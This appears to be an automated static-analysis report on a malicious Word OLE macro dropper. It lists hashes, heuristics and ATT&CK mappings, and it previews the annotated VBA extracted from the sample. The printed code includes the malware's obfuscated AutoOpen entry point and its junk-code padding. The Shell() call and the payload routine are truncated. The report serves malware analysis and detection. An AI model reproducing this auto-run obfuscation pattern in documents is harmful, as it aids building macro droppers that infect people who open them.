Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 38e790bd07cd5f4f…

MALICIOUS

Office (OLE)

159.0 KB Created: 2018-04-26 19:47:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: b4a09c8b5705427d4cdab9b0f357cdec SHA-1: 1f7a7e7e280b35cc31cfc35fc684a16b7d12605a SHA-256: 38e790bd07cd5f4fe844f600f44fccadf0842eac6977c1a3f17b3a3c6b792ef5
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-6520300-0'. Static analysis recovered a VBA project containing an AutoOpen routine, which runs automatically when the document is opened (T1204.002 leading to T1059.005). The critical OLE_VBA_SHELL heuristic indicates that the macro can launch an external process via Shell(); together with the ClamAV "Dropper" classification this is consistent with a downloader/dropper, but no download URL, network API call or payload path was recovered statically — the only extracted URL is a standard OOXML schema namespace — so the second-stage retrieval mechanism is not established by this report and should be confirmed dynamically. The extracted VBA is heavily padded with junk routines (Select Case blocks keyed on never-assigned variables whose results are never read); the AutoOpen body's only substantive action is a call to WFIiJlvJ(), whose definition, like the flagged Shell() call, lies beyond the displayed portion of the preview.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6520300-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6520300-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note: this canned description does not fit the present sample — a 51,524-byte VBA project was in fact recovered (see OLE_VBA_MACROS and the extracted macros.bas below), so this marker is redundant with, and superseded by, the VBA findings.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace URI that Office itself embeds in documents; it is expected content, not a network indicator, and must not be treated as a C2 or payload-download location.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 51524 bytes
SHA-256: 55f9471412d1ed0d67fe489fd0e8a32913ca0a3dfaeec72e2dfce79a926731fb
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "faIrjMMPpimGkB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: filler routine. The Select Case key (zEAGzn) and every
' right-hand-side operand are never declared or assigned anywhere in the
' visible listing, and the assigned locals are never read afterwards, so
' (presumably: an undeclared VBA name is Empty and compares as 0) neither
' Case is expected to match and the body should be a no-op. The routine is
' not called from any procedure in the displayed preview. Verify against the
' full 51,524-byte extraction before drawing conclusions.
Sub rvziDh(OEmAWw)
Select Case zEAGzn
         Case 32655
            koRJsW = WFTNSw
            objUzq = Round(45942)
            jrtFG = Hex(VUuLfE - ChrW(INuoW))
            hhjJih = QYZcp
         Case 50260
            iFaPm = CByte(30343)
            BlYBn = Log(dfOmja)
End Select
End Sub
' Analyst note: three more junk Select Case blocks of the same template as
' rvziDh -- keys (FobDn, cdCQQ, bcwHU) never assigned, operands never
' defined, results never consumed. Nothing here references the parameter
' zKzuS. Not called from any routine in the displayed preview; treat as
' obfuscation padding unless the truncated remainder shows otherwise.
Sub qUChP(zKzuS)
Select Case FobDn
         Case 58249
            HkjwH = rnjkJ
            wOVZOC = Round(85466)
            OSqEq = Hex(ihFBb - ChrW(IiTUKX))
            ZXlQan = VIkPN
         Case 2483
            dnotbG = CByte(1891)
            JhfIhf = Log(uBOqG)
End Select
Select Case cdCQQ
         Case 66928
            Wzpnaj = qfaiRu
            ODlRGc = Round(7279)
            iAWub = Hex(KmdLX - ChrW(HMrri))
            AbPaj = MXOZR
         Case 98222
            GjJOp = CByte(32181)
            FijtzX = Log(ioBMtj)
End Select
Select Case bcwHU
         Case 96416
            DlkUiA = jwzCb
            vWuVd = Round(18112)
            ijNMXP = Hex(fEKGU - ChrW(wBsvY))
            WdupD = ShKEh
         Case 54335
            KTzTYX = CByte(94212)
            vlfnr = Log(IDtiwz)
End Select
End Sub
' Analyst note: junk padding, same template as the routines above. Both
' Select Case keys (cJwwiT, vudVL) are never assigned in the visible listing
' and the parameter FhvaW is never used. Not referenced from the displayed
' preview.
Sub mAnuJ(FhvaW)
Select Case cJwwiT
         Case 46339
            EbsPCM = JiQaji
            YTLZP = Round(41103)
            jzLIEP = Hex(JEKKa - ChrW(GLHXr))
            ZwDiAm = IlfmI
         Case 9430
            kXbhH = CByte(95306)
            FzZFPI = Log(NNLoh)
End Select
Select Case vudVL
         Case 41582
            GliRC = Xmija
            uzUwd = Round(47483)
            ivvYTw = Hex(mGpuGW - ChrW(wrTUHD))
            lWidk = nSbwz
         Case 93416
            rEKMLT = CByte(51784)
            QwncE = Log(zIAbVU)
End Select
End Sub
' Analyst note: the auto-execution entry point (OLE_VBA_AUTOOPEN; VBA
' procedure names are case-insensitive, so "Autoopen" is recognised as
' AutoOpen and runs when the document is opened: T1204.002 -> T1059.005).
' "On Error Resume Next" silences every runtime error in this routine, so the
' two junk Select Case blocks (keys sZQui / hkbkPq never assigned, results
' never read) fail silently. The only substantive statement is the single
' call in the middle: WFIiJlvJ(hhEwjT + XAcwAvYni + iUYaIp). Neither
' WFIiJlvJ nor the three concatenated operands are defined anywhere in the
' displayed preview; presumably the callee -- and the Shell() call that
' OLE_VBA_SHELL flagged -- live in the truncated remainder of macros.bas.
' Confirm against the full extraction before attributing download behaviour.
Sub Autoopen()
On Error Resume Next
Select Case sZQui
         Case 52558
            UfrvJv = rjGJoc
            UZqBjs = Round(80862)
            bWdbB = Hex(fuScrn - ChrW(lFsSJl))
            ctSjs = YAZtBj
         Case 95397
            DVRit = CByte(90559)
            mojwp = Log(iUwiXG)
End Select
' The real payload call -- everything else in this routine is padding.
WFIiJlvJ (hhEwjT + XAcwAvYni + iUYaIp)
Select Case hkbkPq
         Case 86455
            ElkCnp = bLicNd
            QUwaU = Round(64936)
            QGozH = Hex(kWzIQ - ChrW(rdTMhf))
            wsMwjc = LTGlo
         Case 41559
            XoivC = CByte(62731)
            wENVLV = Log(szHRuj)
End Select
End Sub
' Analyst note: junk padding -- three Select Case blocks keyed on names
' (ooRiz, JakXK, OEwVj) that are never assigned in the visible listing, with
' operands never defined and results never read. Parameter QPLTuj unused.
' Not called from any routine in the displayed preview.
Sub ZDJIXz(QPLTuj)
Select Case ooRiz
         Case 94440
            nwaUG = SVwUu
            cwkVnf = Round(67507)
            foCCQp = Hex(EJqmu - ChrW(jlEjnQ))
            XuRrY = EWETd
         Case 99295
            zXwwY = CByte(6583)
            GOMHh = Log(zvMflz)
End Select
Select Case JakXK
         Case 56520
            lvzpN = inImIL
            zSJhJJ = Round(48532)
            IJZhi = Hex(GZmblu - ChrW(jLOWuu))
            MnZXa = PrQCO
         Case 2588
            wdlaI = CByte(67686)
            XOVLW = Log(pSGuL)
End Select
Select Case OEwVj
         Case 3834
            OVPIk = kqwDa
            OLszwR = Round(26640)
            JawkW = Hex(zmABHB - ChrW(BUjIF))
            zlasPj = wDVGw
         Case 7748
            BwoYf = CByte(73215)
            NzqvvY = Log(NrMos)
End Select
End Sub
' Analyst note: last junk routine in the first module (faIrjMMPpimGkB). Same
' template: Select Case key fXEfH never assigned, operands undefined, results
' unused, parameter uvQtC unused. Not referenced from the displayed preview.
Sub OPjhhD(uvQtC)
Select Case fXEfH
         Case 55812
            slnjz = IqjMJ
            GYHlM = Round(13624)
            cWzRhz = Hex(rssILF - ChrW(YmdbA))
            NuZLjH = wfYlrY
         Case 30101
            zuUGm = CByte(9843)
            PzaAEG = Log(liJMWi)
End Select
End Sub

Attribute VB_Name = "wmhZWvMUHQnp"
Sub asIVO(kfckiD)
Select Case Otubi
         Case 3340
            TBImhP = QvqKN
            vHtVo = Round(96940)
            tBTBwV = Hex(hSafl - ChrW(ErZkWn))
            WUjmaV = YGAYmj
         Case 204
... (truncated)